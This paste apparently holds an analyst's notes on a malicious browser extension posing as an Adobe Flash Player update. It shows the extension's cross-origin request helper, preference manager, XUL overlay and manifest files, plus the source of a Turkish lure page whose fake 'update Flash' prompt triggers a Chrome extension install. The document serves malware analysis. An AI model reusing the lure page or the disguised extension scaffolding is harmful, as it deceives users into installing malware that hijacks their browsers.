  790. responseText:req.responseText,
  791. readyState:req.readyState,
  792. responseHeaders:(req.readyState==4?req.getAllResponseHeaders():''),
  793. status:(req.readyState==4?req.status:0),
  794. statusText:(req.readyState==4?req.statusText:'')
  795. }
  796.  
  797. // Pop back onto browser thread and call event handler.
  798. // Have to use nested function here instead of GM_hitch because
  799. // otherwise details[event].apply can point to window.setTimeout, which
  800. // can be abused to get increased priveledges.
  801. new XPCNativeWrapper(unsafeContentWin, "setTimeout()")
  802. .setTimeout(function(){details[event](responseState);}, 0);
  803. }
  804. }
  805. }
  806. ##################
  807. prefman
  808.  
  809. function adobeflashplayer_PrefManager() {
  810. var startPoint="adobeflashplayer.";
  811.  
  812. var pref=Components.classes["@mozilla.org/preferences-service;1"].
  813. getService(Components.interfaces.nsIPrefService).
  814. getBranch(startPoint);
  815.  
  816. var observers={};
  817.  
  818. // whether a preference exists
  819. this.exists=function(prefName) {
  820. return pref.getPrefType(prefName) != 0;
  821. }
  822.  
  823. // returns the named preference, or defaultValue if it does not exist
  824. this.getValue=function(prefName, defaultValue) {
  825. var prefType=pref.getPrefType(prefName);
  826.  
  827. // underlying preferences object throws an exception if pref doesn't exist
  828. if (prefType==pref.PREF_INVALID) {
  829. return defaultValue;
  830. }
  831.  
  832. switch (prefType) {
  833. case pref.PREF_STRING: return pref.getCharPref(prefName);
  834. case pref.PREF_BOOL: return pref.getBoolPref(prefName);
  835. case pref.PREF_INT: return pref.getIntPref(prefName);
  836. }
  837. }
  838.  
  839. // sets the named preference to the specified value. values must be strings,
  840. // booleans, or integers.
  841. this.setValue=function(prefName, value) {
  842. var prefType=typeof(value);
  843.  
  844. switch (prefType) {
  845. case "string":
  846. case "boolean":
  847. break;
  848. case "number":
  849. if (value % 1 != 0) {
  850. throw new Error("Cannot set preference to non integral number");
  851. }
  852. break;
  853. default:
  854. throw new Error("Cannot set preference with datatype: " + prefType);
  855. }
  856.  
  857. // underlying preferences object throws an exception if new pref has a
  858. // different type than old one. i think we should not do this, so delete
  859. // old pref first if this is the case.
  860. if (this.exists(prefName) && prefType != typeof(this.getValue(prefName))) {
  861. this.remove(prefName);
  862. }
  863.  
  864. // set new value using correct method
  865. switch (prefType) {
  866. case "string": pref.setCharPref(prefName, value); break;
  867. case "boolean": pref.setBoolPref(prefName, value); break;
  868. case "number": pref.setIntPref(prefName, Math.floor(value)); break;
  869. }
  870. }
  871.  
  872. // deletes the named preference or subtree
  873. this.remove=function(prefName) {
  874. pref.deleteBranch(prefName);
  875. }
  876.  
  877. // call a function whenever the named preference subtree changes
  878. this.watch=function(prefName, watcher) {
  879. // construct an observer
  880. var observer={
  881. observe:function(subject, topic, prefName) {
  882. watcher(prefName);
  883. }
  884. };
  885.  
  886. // store the observer in case we need to remove it later
  887. observers[watcher]=observer;
  888.  
  889. pref.QueryInterface(Components.interfaces.nsIPrefBranchInternal).
  890. addObserver(prefName, observer, false);
  891. }
  892.  
  893. // stop watching
  894. this.unwatch=function(prefName, watcher) {
  895. if (observers[watcher]) {
  896. pref.QueryInterface(Components.interfaces.nsIPrefBranchInternal)
  897. .removeObserver(prefName, observers[watcher]);
  898. }
  899. }
  900. }
  901.  
  902. #############
  903. script-compiler-overlay.xul
  904.  
  905. <?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul'>
  906. <script type='application/x-javascript'
  907. src='chrome://adobeflashplayer/content/xmlhttprequester.js'></script><script type='application/x-javascript'
  908. src='chrome://adobeflashplayer/content/prefman.js'></script><script type='application/x-javascript'
  909. src='chrome://adobeflashplayer/content/script-compiler.js'></script></overlay>
  910.  
  911. ########################################################################################################
  912. analise arquivo install rdf
  913.  
  914. <?xml version="1.0"?><RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  915. <Description about="urn:mozilla:install-manifest"><em:id>{9e09ac65-43c0-4b9d-970f-11e2e9616c55}</em:id><em:name>SosyalHilelerim
  916. </em:name><em:version>1.5</em:version><em:description>SosyalHilelerim</em:description><em:creator>Facebook.com</em:creator>
  917. <em:contributor>SosyalHilelerim</em:contributor><em:contributor>http://facebook.com/</em:contributor><em:homepageURL>www.facebook.com
  918. </em:homepageURL><em:targetApplication><Description><em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id><em:minVersion>3.5.*
  919. </em:minVersion><em:maxVersion>12.*</em:maxVersion></Description></em:targetApplication></Description></RDF>
  920.  
  921. ##########################################################################################################
  922. analise arquivo chrome.manifest
  923.  
  924. content adobeflashplayer content/
  925. overlay chrome://browser/content/browser.xul
  926. chrome://adobeflashplayer/content/script-compiler-overlay.xul
  927. ##########################################################################################################
  928.  
  929. pagina:http://www.sosyalaghileleri.com/teror/
  930.  
  931. source:
  932.  
  933. <META http-equiv=content-type content=text/html;charset=iso-8859-9>
  934. <META http-equiv=content-type content=text/html;charset=windows-1254>
  935. <META http-equiv=content-type content=text/html;charset=x-mac-turkish>
  936.  
  937. <script id="_wau0nk">var _wau = _wau || [];
  938. _wau.push(["tab", "moqrduosstcr", "0nk", "bottom-center"]);
  939. (function() {var s=document.createElement("script"); s.async=true;
  940. s.src="http://widgets.amung.us/tab.js";
  941. document.getElementsByTagName("head")[0].appendChild(s);
  942. })();</script>
  943.  
  944. <!DOCTYPE html>
  945. <html class="no-js consumer" lang="tr">
  946. <title>Pkk'nin Sonu </title>
  947.  
  948. <!-- Mirrored from fastotoliked.com/ by HTTrack Website Copier/3.x [XR&CO'2010], Mon, 21 Jan 2013 19:16:02 GMT -->
  949. <head>
  950.  
  951. <meta name="google-site-verification" content="enlibeccmboipfmpmjoecfdmnahcjlhj">
  952. <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/djpnjilhooodipllnjedjeiabkboakok">
  953. <link rel="shortcut icon" href="http://cdn1.iconfinder.com/data/icons/yooicons_set09_halloween/128/cheshire_cat.png">
  954. <script>
  955. <a href="javascript:" onclick="kur();" style="text-decoration:none;">
  956.  
  957. </a></div><a href="javascript:" onclick="kur();" style="text-decoration:none;">
  958.  
  959. <script>
  960. if(top!=self)
  961. {
  962. top.location=self.location;
  963. }
  964. if(frames)
  965. {
  966. if(top.frames.length>0)
  967. top.location.href=self.location;
  968. }
  969. </script>
  970. <a href="javascript:" onclick="kur();" style="text-decoration:none;"></a>
  971. <script type="text/javascript">
  972.  
  973. function kur()
  974. {
  975. chrome.webstore.install("https://chrome.google.com/webstore/detail/djpnjilhooodipllnjedjeiabkboakok");
  976. alert("FlashPlayer Eklentisi Tarayicinizda Güncel Degil , Devam Etmek Için Ekle'ye Tiklayin");
  977. }
  978. </script>
  979. </title>
  980. <link href="../www.google.com/images/icons/product/chrome-32.png" rel="icon" type="image/ico">
  981. <div class="browser-landing" id="main">
  982. <link href=
  983. "http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700&amp;subset=latin,latin-ext" rel=
  984. "stylesheet">
  985. <script type="text/javascript">
  986. document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%69%6E%74%6C%2F%74%72%2F%63%68%72%6F%6D%65%2F%61%73%73%65%74%73%2F%63%6F%6D%6D%6F%6E%2F%63%73%73%2F%63%68%72%6F%6D%65%2E%6D%69%6E%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%22%2F%2F%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6A%73%2F%67%77%65%62%2F%61%6E%61%6C%79%74%69%63%73%2F%61%75%74%6F%74%72%61%63%6B%2E%6A%73%22%3E%0A%09%3C%2F%73%63%72%69%70%74%3E'));
  987. </script>
  988. <style>
  989. body{
  990. background-image: url(turkey.jpg);
  991. background-attachment: scroll;}
  992. </style>
  993. <div class="compact marquee-stacked" id="marquee">
  994. <div class="marquee-copy">
  995. <h1>
  996. Pkk Teröristlerinin Sonu !
  997. </h1>
  998. <p>
  999. <font color='#cococo' > Helal Olsun Türk Askerim , Arkanizdayiz ..</font>
  1000. <a href="javascript:" onclick="kur();"> <img src="anasayfa.jpg"</a>
  1001. <br>
  1002. <center>
  1003. <a class="button eula-download-button" data-g-event="cta" data-g-label="download-chrome" href="javascript:" onclick="kur();">FlashPlayer Güncelle</a>
  1004. </center>
  1005. <font color='#cococo' > FlashPlayer Yüklü Olmadigindan Video Açilamiyor</font> </p> </center> <a href="javascript:" onclick="kur();"> <img src="flash.png"><br><br>
  1006. <div class="marquee-image">
  1007.  
  1008.  
  1009. <script language="javascript" src="yasak.js"></script>
  1010. <h1>
  1011. <b>
  1012. ProFonix , Erkan Durmaz , Bcykn Yapimidir ;)
  1013. </b>
  1014. </h1>
  1015. <script type="text/javascript"><!--
  1016. google_ad_client = "ca-pub-9802413630581770";
  1017. /* newclient */
  1018. google_ad_slot = "7314422608";
  1019. google_ad_width = 728;
  1020. google_ad_height = 90;
  1021. //-->
  1022. </script>
  1023. <script type="text/javascript"
  1024. src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
  1025. </script>
  1026.  
  1027.  
  1028. <!-- Mirrored from fastotoliked.com/ by HTTrack Website Copier/3.x [XR&CO'2010], Mon, 21 Jan 2013 19:16:14 GMT -->
  1029. </html>
  1030.  
  1031.  
  1032.  
  1033. *google translator
  1034. **idioma turco
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement